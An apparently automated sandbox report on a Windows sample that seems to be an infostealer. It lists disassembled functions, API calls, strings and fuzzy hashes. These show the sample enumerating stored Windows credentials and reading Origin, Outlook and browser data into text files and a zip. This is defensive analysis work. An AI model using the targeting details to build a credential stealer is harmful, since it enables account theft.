Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$AllocCloseFileHandlelstrlen$ByteCharCreateMultiSizeTextUnicodeWidewsprintf
String ID: %s%s$PSI.txt
API String ID: 1621496930-3624082832
Opcode ID: 7e130e7dad1defb2c6dadf54f4be0ebeb4c282441cd03107c8dc335e10c20eb6
Instruction ID: e9df3858fc7b22bbd6d18cda31c554b1f89d102c115574f937aa7c5fc444e789
Opcode Fuzzy Hash: 7e130e7dad1defb2c6dadf54f4be0ebeb4c282441cd03107c8dc335e10c20eb6
Instruction Fuzzy Hash: 5A713C75A00229DBDF219F68DC84AEEB7B8EF49304F0441D5E949A3261DB305E85CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D9780A, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,0000FFFE,00000000,767F8B40,00DDBB00), ref: 00D97822
CredEnumerateW.SECHOST ref: 00D9784B
StrStrW.SHLWAPI(?,?,?,?,00DD9D0C,00000000,AppData,00DD9D08,00000000), ref: 00D978BF
wsprintfW.USER32 ref: 00D978F6
lstrlenW.KERNEL32(00000000), ref: 00D97900
StrStrA.SHLWAPI ref: 00D9791F
_mbstowcs.LIBCMT ref: 00D97938
lstrcpyW.KERNEL32 ref: 00D9795C
lstrlenW.KERNEL32(00000000,?), ref: 00D97967

Part of subcall function 00D976E7: wsprintfW.USER32 ref: 00D97731
Part of subcall function 00D976E7: lstrlenW.KERNEL32(00000000), ref: 00D9773B
Part of subcall function 00D976E7: StrStrA.SHLWAPI ref: 00D9775E
Part of subcall function 00D976E7: _mbstowcs.LIBCMT ref: 00D9776E
Part of subcall function 00D976E7: lstrcpyW.KERNEL32 ref: 00D97796
Part of subcall function 00D976E7: lstrlenW.KERNEL32(00000000,?), ref: 00D977D8

CredFree.ADVAPI32 ref: 00D9799A
GlobalFree.KERNEL32 ref: 00D9799D

Strings

%s%s%s%s, xrefs: 00D978F0
QtKeychain, xrefs: 00D9786E
-, xrefs: 00D97952

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CredFreeGlobal_mbstowcslstrcpywsprintf$AllocEnumerate
String ID: %s%s%s%s$-$QtKeychain
API String ID: 1292968386-3796682301
Opcode ID: 353ad15e49c4c30fd863acaddae26fdf20ada0db473590ae3498db6881db3db6
Instruction ID: 875dad31a4b12fe545666f1bf2eac872a05e66275d99ec15e553a3f9bdf75afc
Opcode Fuzzy Hash: 353ad15e49c4c30fd863acaddae26fdf20ada0db473590ae3498db6881db3db6
Instruction Fuzzy Hash: 5F511975A04219EFCF049F98DC85AAEBBB6FF88314F15416AE805A7361D7309E04DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D35E7D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

PathCombineW.SHLWAPI ref: 00D35EBE

Part of subcall function 00D96B54: lstrlenW.KERNEL32(00000000,767F8B40,00D9A735,?,00000073,00000068,?), ref: 00D96B58

PathFileExistsW.KERNELBASE ref: 00D35ED8
lstrcpyW.KERNEL32 ref: 00D35EEE

Part of subcall function 00D96506: lstrlenW.KERNEL32(00000000,0000005C,?,6B86F820,00D9A965,?,?,?,?,?,?), ref: 00D9650F
Part of subcall function 00D96506: StrRChrW.SHLWAPI(?,?,?,?,?,?), ref: 00D96528
Part of subcall function 00D96506: lstrcpyW.KERNEL32 ref: 00D96535

Part of subcall function 00D96806: CreateFileW.KERNELBASE ref: 00D96845
Part of subcall function 00D96806: GetFileSize.KERNEL32(00000000,00000000), ref: 00D96858
Part of subcall function 00D96806: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D96863
Part of subcall function 00D96806: PathFindNextComponentW.SHLWAPI ref: 00D968B9

lstrcpyW.KERNEL32 ref: 00D35F18
StrStrW.SHLWAPI ref: 00D35F68
wsprintfW.USER32 ref: 00D35F81

Part of subcall function 00D96806: GlobalFree.KERNEL32 ref: 00D9697F

lstrcpyW.KERNEL32 ref: 00D35FAF
GlobalFree.KERNEL32 ref: 00D3600C

Strings

Origin\local.xml, xrefs: 00D35EE2
local_, xrefs: 00D35F5A
Origin\%s, xrefs: 00D35F7B
Origin\, xrefs: 00D35EAC
local.xml, xrefs: 00D35EF4

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$Global$FilePath$AllocFreelstrlen$CombineComponentCreateExistsFindNextSizewsprintf
String ID: Origin\$Origin\%s$Origin\local.xml$local.xml$local_
API String ID: 2632650670-15824112
Opcode ID: e66fc9b1f6c9e38da59c102cf32893dfdf51c3be836321daa5ef07550a4d818e
Instruction ID: cc7b8256c333f412587ab2c5f14c0fc96c8ab54cd4e13db8869b9f3be102565b
Opcode Fuzzy Hash: e66fc9b1f6c9e38da59c102cf32893dfdf51c3be836321daa5ef07550a4d818e
Instruction Fuzzy Hash: F541D171A40319DBCF10AB24ED49AAE77A9AF84714F0805AAE906D3394EB709E05CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D95CDD, Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 631memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D937F4: StrStrW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D93815
Part of subcall function 00D937F4: PathFindNextComponentW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D9384A

Part of subcall function 00D9354A: wsprintfA.USER32 ref: 00D9357E

wsprintfA.USER32 ref: 00D96307

Part of subcall function 00D9672D: CreateFileW.KERNELBASE ref: 00D96764
Part of subcall function 00D9672D: GetFileSize.KERNEL32(00000000,00000000), ref: 00D96773
Part of subcall function 00D9672D: GlobalAlloc.KERNEL32(00000040,00000001), ref: 00D96786
Part of subcall function 00D9672D: ReadFile.KERNELBASE ref: 00D967A9
Part of subcall function 00D9672D: wsprintfA.USER32 ref: 00D967BC
Part of subcall function 00D9672D: GlobalFree.KERNEL32 ref: 00D967DC

GlobalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 00D9639C

Part of subcall function 00D9388D: GlobalAlloc.KERNEL32(00000040,00007FFF), ref: 00D938A4
Part of subcall function 00D9388D: StrStrA.SHLWAPI(?,v10), ref: 00D938C6
Part of subcall function 00D9388D: GlobalFree.KERNEL32 ref: 00D938FB

GlobalFree.KERNEL32 ref: 00D963EB
GlobalFree.KERNEL32 ref: 00D963FA
GlobalAlloc.KERNEL32(00000040,00007FFF,?,00000000), ref: 00D96407
wsprintfW.USER32 ref: 00D96466
lstrlenW.KERNEL32(00000000,?), ref: 00D96477
GlobalFree.KERNEL32 ref: 00D9648E
GlobalFree.KERNEL32 ref: 00D964D3

Strings

., xrefs: 00D95DA1
_, xrefs: 00D95D8D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Allocwsprintf$File$ComponentCreateFindNextPathReadSizelstrlen
String ID: .$_
API String ID: 2889162783-3350077243
Opcode ID: 43d80afe9e5a8ef30462bba45938f3882e1c1890a5b2816f25b30dc7aaaae7ba
Instruction ID: 827235eb9c41433c6e8f5693472656039c8d86dd4e91eeddbf5fc5ffffe552fe
Opcode Fuzzy Hash: 43d80afe9e5a8ef30462bba45938f3882e1c1890a5b2816f25b30dc7aaaae7ba
Instruction Fuzzy Hash: B7321925A5435899FB20CBA0DC52BFDB331FF54710F1051DAE50CAB291E6B21EC5CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00DA9B25, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 00DA9DC6, 00DA9DCB

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 890f74a8456e7b28d77ab37107081a69ce4d2c1d1745a85aaa9ad8dab44bfaf8
Instruction ID: 4aebd960ac98279b6dfd3553f26c7d3cead40b818e5a968109aebe33c26f5d5f
Opcode Fuzzy Hash: 890f74a8456e7b28d77ab37107081a69ce4d2c1d1745a85aaa9ad8dab44bfaf8
Instruction Fuzzy Hash: CDC1BDB0A05249EBDF15DFA9D8A0BADFBB0EF5B310F084159E541AB392C7349A41CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DAA80C, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00DAA4C5: CreateFileW.KERNELBASE(00000000,00000000,?,00DAA8B5,?,?,00000000,?,00DAA8B5,00000000,0000000C), ref: 00DAA4E2

GetLastError.KERNEL32 ref: 00DAA920
__dosmaperr.LIBCMT ref: 00DAA927
GetFileType.KERNELBASE(00000000), ref: 00DAA933
GetLastError.KERNEL32 ref: 00DAA93D
__dosmaperr.LIBCMT ref: 00DAA946
CloseHandle.KERNEL32(00000000), ref: 00DAA966
CloseHandle.KERNEL32(00DA8613), ref: 00DAAAB3
GetLastError.KERNEL32 ref: 00DAAAE5
__dosmaperr.LIBCMT ref: 00DAAAEC

Strings

H, xrefs: 00DAAA71

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7d5dfa4b061b2da255cd9c501fe543fbe1a8713a1a5927dba5023cae054e570e
Instruction ID: 137e01ef9d240cfa23cb58691098ace7e1f1590865509d5ed7342f93c15f095a
Opcode Fuzzy Hash: 7d5dfa4b061b2da255cd9c501fe543fbe1a8713a1a5927dba5023cae054e570e
Instruction Fuzzy Hash: 8AA10132A102458FCF199F7CD8517AE7BA1EB0B320F18025DE851EB391DB359912CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00D935BE, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 153stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D937F4: StrStrW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D93815
Part of subcall function 00D937F4: PathFindNextComponentW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D9384A

Part of subcall function 00D9354A: wsprintfA.USER32 ref: 00D9357E

wsprintfA.USER32 ref: 00D9360F

Part of subcall function 00D9672D: CreateFileW.KERNELBASE ref: 00D96764
Part of subcall function 00D9672D: GetFileSize.KERNEL32(00000000,00000000), ref: 00D96773
Part of subcall function 00D9672D: GlobalAlloc.KERNEL32(00000040,00000001), ref: 00D96786
Part of subcall function 00D9672D: ReadFile.KERNELBASE ref: 00D967A9
Part of subcall function 00D9672D: wsprintfA.USER32 ref: 00D967BC
Part of subcall function 00D9672D: GlobalFree.KERNEL32 ref: 00D967DC

GlobalAlloc.KERNEL32(00000040,0000FFFE,00000000,?,00000000), ref: 00D936A4
GlobalReAlloc.KERNEL32 ref: 00D936E9
lstrcatW.KERNEL32(00000000,00000000), ref: 00D9370D
lstrcatW.KERNEL32(00000000,00DCEFB0), ref: 00D9372E
lstrcatW.KERNEL32(00000000,00DCEB08), ref: 00D9373F
lstrlenW.KERNEL32(00000000,?), ref: 00D93766
GlobalFree.KERNEL32 ref: 00D9377D
GlobalFree.KERNEL32 ref: 00D937C1

Strings

%S_%S%c.txt, xrefs: 00D93609

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFreelstrcatwsprintf$ComponentCreateFindNextPathReadSizelstrlen
String ID: %S_%S%c.txt
API String ID: 1264568463-3930552783
Opcode ID: 8a61d6bf6eac125e91b3e3cf76fc057885c4e7c43d31df4ce5e39b9ce111c194
Instruction ID: 53b784f42dfa3a4dcce50b98710484e87278ec6b8f1a72941c1d2cf96fb3554a
Opcode Fuzzy Hash: 8a61d6bf6eac125e91b3e3cf76fc057885c4e7c43d31df4ce5e39b9ce111c194
Instruction Fuzzy Hash: D75153B5900229ABDF21AFA4DC85AADB7B8EF15718F0041A9E909A7250DF309F45CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D9494D, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136memorystringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000000,000000FF,00000000,?,00000000), ref: 00D94998
lstrlenA.KERNEL32(00000000), ref: 00D949DB
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D949EB
wsprintfW.USER32 ref: 00D94A6F
GlobalFree.KERNEL32 ref: 00D94A7B
lstrlenW.KERNEL32(00000000,?), ref: 00D94A86
GlobalFree.KERNEL32 ref: 00D94A9F

Strings

%sTRUE%s%s%s%s%S, xrefs: 00D94A69
FALSE, xrefs: 00D94A47
TRUE, xrefs: 00D94A4C, 00D94A54

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFreelstrlen$wsprintf
String ID: %sTRUE%s%s%s%s%S$FALSE$TRUE
API String ID: 2712360755-3404159823
Opcode ID: 4d83b51b00aa06b5eec718b487063d7ddfc43706b308a00aaa2f0f650ba599c1
Instruction ID: 206b1bf8871eb583c36d9d27309ad609faf78b2aca4b0647b1d80f7b66c7a105
Opcode Fuzzy Hash: 4d83b51b00aa06b5eec718b487063d7ddfc43706b308a00aaa2f0f650ba599c1
Instruction Fuzzy Hash: 3641B271640204BBEF15ABA49C46FBF767DDF46701F140118FE01E6281EB749E099AB9

Uniqueness

Uniqueness Score: -1.00%

Function 00D9672D, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00D96764
GetFileSize.KERNEL32(00000000,00000000), ref: 00D96773
GlobalAlloc.KERNEL32(00000040,00000001), ref: 00D96786
ReadFile.KERNELBASE ref: 00D967A9
wsprintfA.USER32 ref: 00D967BC
GlobalFree.KERNEL32 ref: 00D967DC

Strings

memvfs, xrefs: 00D967CB
file:/whatever?ptr=0x%p&sz=%lu, xrefs: 00D967B6

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Global$AllocCreateFreeReadSizewsprintf
String ID: file:/whatever?ptr=0x%p&sz=%lu$memvfs
API String ID: 3952211499-1237130694
Opcode ID: 9acbe0ea546d6f41c2e7426300812eea3712521a26e7912cdde582fb9965e6e8
Instruction ID: c749ad50f5a5b4f85162d898e0a7afadc2bd42c108f99aa4b03ab27ee4b35951
Opcode Fuzzy Hash: 9acbe0ea546d6f41c2e7426300812eea3712521a26e7912cdde582fb9965e6e8
Instruction Fuzzy Hash: 6A212171A40315EBDB10AB799C49E6EBB7DEF84B14F050216B915E33E0DE70D9058774

Uniqueness

Uniqueness Score: -1.00%

Function 00D3574F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83stringCOMMON

Download Yara Rule

APIs

WTSEnumerateProcessesW.WTSAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00DDBB00), ref: 00D3578D
lstrcmpW.KERNEL32(?,?), ref: 00D357D7
lstrlenW.KERNEL32(?), ref: 00D35802
wsprintfW.USER32 ref: 00D35822
lstrlenW.KERNEL32(?,?), ref: 00D35839
WTSFreeMemory.WTSAPI32(00000000), ref: 00D3586F

Strings

%s, xrefs: 00D3581C

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$EnumerateFreeMemoryProcesseslstrcmpwsprintf
String ID: %s
API String ID: 3374355776-3043279178
Opcode ID: ba50a87181ba253875bdbd0371fad122c2cbffa710f5eb8641b5942d3e13351f
Instruction ID: 617c6982b9a13ffcd99c5a83f8186dff471a7346ad0da71a0d83e9e270faf0fd
Opcode Fuzzy Hash: ba50a87181ba253875bdbd0371fad122c2cbffa710f5eb8641b5942d3e13351f
Instruction Fuzzy Hash: DD311A71D00228EBDF219F54DC85BD9B7B8FF04704F0442E9AA49A2254D7B0AED49FE0

Uniqueness

Uniqueness Score: -1.00%

Function 00D364DA, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 87stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,foo1.zip,00000000,00DDBB00), ref: 00D36525
wsprintfA.USER32 ref: 00D36539

Strings

/%s, xrefs: 00D36530, 00D365A0
foo1.zip, xrefs: 00D364EF, 00D36562

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenwsprintf
String ID: /%s$foo1.zip
API String ID: 357247895-3622855063
Opcode ID: f3b2f00505192508c85d3f280be76d03627c8c2680bc850c1664882c6238f06a
Instruction ID: 1d0bd3c61b219c8e497c01b74079b7291fcf9eca8cf4bcd4cd50ac5e9dacb6de
Opcode Fuzzy Hash: f3b2f00505192508c85d3f280be76d03627c8c2680bc850c1664882c6238f06a
Instruction Fuzzy Hash: 4231C271A01268EBCB21EB24EC56AEEB768AF40714F0445A9F501D7385DBB0DE488BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D96544, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE ref: 00D9658E
RegQueryInfoKeyW.ADVAPI32 ref: 00D965BD
RegEnumKeyExW.ADVAPI32 ref: 00D9660A
GlobalAlloc.KERNEL32(00000040,00000400), ref: 00D96625
RegCloseKey.ADVAPI32 ref: 00D96684

Strings

outlook.txt, xrefs: 00D9655A

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCloseEnumGlobalInfoOpenQuery
String ID: outlook.txt
API String ID: 2965733314-1541743462
Opcode ID: ddd04e95eab21679b1338bef4c82a148d353c349836cc3a7d455567ed3470fd6
Instruction ID: 6b1ca2925e6aae3a8a0f5a6b7b49422b714e5e856448ace203bc18f4a5c8c225
Opcode Fuzzy Hash: ddd04e95eab21679b1338bef4c82a148d353c349836cc3a7d455567ed3470fd6
Instruction Fuzzy Hash: 8531F175A00218DBDF609F19DD44EAAB7F8FF85714F048195A985E3250DE709E858FB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D94AC3, Relevance: 10.3, APIs: 2, Strings: 4, Instructions: 1287COMMON

Download Yara Rule

APIs

Part of subcall function 00D937F4: StrStrW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D93815
Part of subcall function 00D937F4: PathFindNextComponentW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D9384A

Part of subcall function 00D9354A: wsprintfA.USER32 ref: 00D9357E

wsprintfA.USER32 ref: 00D95BEE

Part of subcall function 00D9672D: CreateFileW.KERNELBASE ref: 00D96764
Part of subcall function 00D9672D: GetFileSize.KERNEL32(00000000,00000000), ref: 00D96773
Part of subcall function 00D9672D: GlobalAlloc.KERNEL32(00000040,00000001), ref: 00D96786
Part of subcall function 00D9672D: ReadFile.KERNELBASE ref: 00D967A9
Part of subcall function 00D9672D: wsprintfA.USER32 ref: 00D967BC
Part of subcall function 00D9672D: GlobalFree.KERNEL32 ref: 00D967DC

GlobalFree.KERNEL32 ref: 00D95CA4

Part of subcall function 00D9494D: GlobalAlloc.KERNEL32(00000040,00000000,000000FF,00000000,?,00000000), ref: 00D94998
Part of subcall function 00D9494D: lstrlenA.KERNEL32(00000000), ref: 00D949DB
Part of subcall function 00D9494D: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D949EB
Part of subcall function 00D9494D: wsprintfW.USER32 ref: 00D94A6F
Part of subcall function 00D9494D: GlobalFree.KERNEL32 ref: 00D94A7B
Part of subcall function 00D9494D: lstrlenW.KERNEL32(00000000,?), ref: 00D94A86
Part of subcall function 00D9494D: GlobalFree.KERNEL32 ref: 00D94A9F

Strings

k, xrefs: 00D94B8B
%, xrefs: 00D94B92
%, xrefs: 00D94B81
., xrefs: 00D94B7D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Freewsprintf$AllocFile$lstrlen$ComponentCreateFindNextPathReadSize
String ID: %$%$.$k
API String ID: 2316688301-2751341796
Opcode ID: e73a4870d3a91fe653257522c544028f9e6c175a23d352448be8bf10d8dda5b3
Instruction ID: e0659aa28d935c4949d58fa6684266ac194553feb5d2236ed124b948611dafaa
Opcode Fuzzy Hash: e73a4870d3a91fe653257522c544028f9e6c175a23d352448be8bf10d8dda5b3
Instruction Fuzzy Hash: 62B2FA15A5835899EB20CBA09C16BEEA331FF54750F1064DAD50CAF2E1E7B21FC4CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00DA300F, Relevance: 9.3, APIs: 6, Instructions: 270COMMON

Download Yara Rule

APIs

Part of subcall function 00DA2EE5: CloseHandle.KERNEL32(?,?,?,00DA301C,?,?,00D3AE52,00000000), ref: 00DA2F16
Part of subcall function 00DA2EE5: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00DA301C,?,?,00D3AE52,00000000), ref: 00DA2F2C
Part of subcall function 00DA2EE5: ExitThread.KERNEL32 ref: 00DA2F35

__allrem.LIBCMT ref: 00DA31A5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA31C1
__allrem.LIBCMT ref: 00DA31D8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA31F6
__allrem.LIBCMT ref: 00DA320D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA322B

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$ExitThread$CloseFreeHandleLibrary
String ID:
API String ID: 1885649644-0
Opcode ID: 08049e9d6b66fdb65cbeb10b1f1474c4059b0c476ea954f39c65e39993efb6e6
Instruction ID: 28513d34fe41fb987f402f50570021c698540fa91e6a95163ea30c448599abf2
Opcode Fuzzy Hash: 08049e9d6b66fdb65cbeb10b1f1474c4059b0c476ea954f39c65e39993efb6e6
Instruction Fuzzy Hash: 8681F772A00706AFD724AF79CC42B5AB3EAEF56760F28452EF451D7681E770DA008774

Uniqueness

Uniqueness Score: -1.00%

Function 00D97B9B, Relevance: 9.1, APIs: 6, Instructions: 98filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00D97BEE
GetFileSize.KERNEL32(00000000,00000000), ref: 00D97BFE
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D97C09

Part of subcall function 00D969B2: IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00D969D8
Part of subcall function 00D969B2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000,00000000,00000000), ref: 00D969EA
Part of subcall function 00D969B2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D96A03

GlobalFree.KERNEL32 ref: 00D97C6A
GlobalFree.KERNEL32 ref: 00D97C8C
GlobalFree.KERNEL32 ref: 00D97C93

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$AllocFile$ByteCharCreateMultiSizeTextUnicodeWide
String ID:
API String ID: 131381412-0
Opcode ID: b6e87f06682069eb2cc1c69c9d2a2d96604f4c313dd54cdb9bcffa57f007e691
Instruction ID: 86b7c821604d68738f534502433c957be2de4e32309f15c6ef49fb2c10a667b3
Opcode Fuzzy Hash: b6e87f06682069eb2cc1c69c9d2a2d96604f4c313dd54cdb9bcffa57f007e691
Instruction Fuzzy Hash: C4315C71A00319EBDF109FA9DD49AAEBBB8EF48724F04011AE901F3350CB709E418BB4

Uniqueness

Uniqueness Score: -1.00%

